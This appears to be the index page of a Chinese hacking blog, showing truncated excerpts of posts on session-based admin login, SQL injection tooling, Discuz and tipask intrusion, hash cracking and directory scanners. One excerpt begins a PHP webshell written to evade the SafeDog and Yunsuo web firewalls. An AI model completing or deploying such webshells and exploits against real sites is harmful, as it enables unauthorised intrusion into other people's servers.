原创作品 - 暗月博客|网络安全,WEB渗透,数据安全,渗透编程,安全培训

利用SESSION登录后台

mOon    原创作品     2468次查看    抢沙发    2018年05月02日

利用SESSION登录后台 1、科普 session有什么用:用于用户登录权限验证。 例如当php开启seesion的时候,只要有人访问网站就会生成seesion在php设置好的tmp目录下。 这个seesion我们浏览器同样的可以获取到的。例如访问当前织梦网站: 就会在当然浏览器保存一个cookie 这个c...

thinkphp5_log thinkphp5 日志扫描工具

mOon    原创作品     1811次查看    抢沙发    2018年05月02日

hinkphp5_log thinkphp5日志扫描工具 这个版本是thinkphp5的 thinkphp3的日志扫描工具 版本请在这里下载 https://www.92moon.com/post-62.html thinkphp5_log.py http://www.thinkphps.com/ 2018 www.thinkphps.c...

【原创】AngelSword(天使之剑)漏洞框架的使用

mOon    原创作品     27087次查看    抢沙发    2018年01月22日

【原创】AngelSword(天使之剑)漏洞框架的使用 本公众号不定期更新教程和安全相关文章 还没关注的赶快关注。 安装setuptools     wget --no-check-certificate  https://pypi.python.org/packages/source/s/set...

【原创】(PHP+MYSQL(延时注入和注入工具编写)

mOon    原创作品     2604次查看    抢沙发    2018年01月20日

【原创】(PHP+MYSQL(延时注入和注入工具编写) 【原创】(PHP+MYSQL(延时注入和注入工具编写) 这是以前培训录制的一个课程 现在分享出来给大家学习吧。 延时注入 等于时间差注入   延时...

过狗过云锁一句话

mOon    原创作品     3932次查看    抢沙发    2017年12月08日

这几个月 没什么东西写 东西都是转载 哈哈哈 最近更新一些原创吧。 今天在群里面看到一些机油讨论一些话题。 看到一个据说是过狗过云锁的一句话。 <?php error_reporting(0);set_time_limit(0);$a=$_POST["x"];if($a){$a=str_replace(array(...

如何渗透Discuz论坛(一)

mOon    原创作品     17312次查看    6条评论    2016年06月20日

如何渗透Discuz论坛(一) 作者:mOon     博客:www.moonsec.com 0x01:叙述: 这几篇文章主要的分享给那些经常渗透Discuz 或者对 Discuz论坛无从下手的初学者,可能帮助或者提高你对Discuz论坛的安全认知,从而找到突破的方法,这几篇都是作者真实渗透的案例,如有雷同纯属巧合,毕竟渗透手法基本相...

tipask注入漏洞分析(附exp)

mOon    原创作品     3683次查看    抢沙发    2016年05月20日

tipask注入漏洞分析 ps 几百年没写文章了。有点生疏 各位看客 凑合看下吧。 前几天在52py看到tipask注入利用工具 http://www.52py.org/forum.php?mod=viewthread&tid=1268 以下是lcy帅哥写的exp #encoding=utf-8 #tipask注入...

dz论坛密文生成器【Python】

mOon    原创作品     3995次查看    2条评论    2016年04月27日

dz论坛密文生成器【Python】 一般我们去cmd5.com 解密 破解dz的密文 还是很有难度的。当cmd5破不到的时候, 倒不如自已生成一些密文 然后碰撞 dz uc_server的生成密文方式:         $salt = substr(uniqid(...

多线程后台扫描器【Python】

mOon    原创作品     8010次查看    抢沙发    2016年03月12日

多线程后台扫描器【Python】 作者mOon 博客 www.moonsec.com 先来一张图吧:   相信很多人都用过御剑这款后台扫描工具吧。   扫描速度还是很可算可以的。暗月这款也是可以的。 用法。 E:\workspace\mscan\myto...

phpscan 扫描备份工具(python)

mOon    原创作品     7277次查看    抢沙发    2016年03月12日

phpscan 扫描备份工具(python) 0x01 介绍:         这个工具是扫描网页的备份文件用的。有一定的局限性。在渗透测试陷入僵局的时候可能会对你起到一丝帮助。 0x02 用法:      &...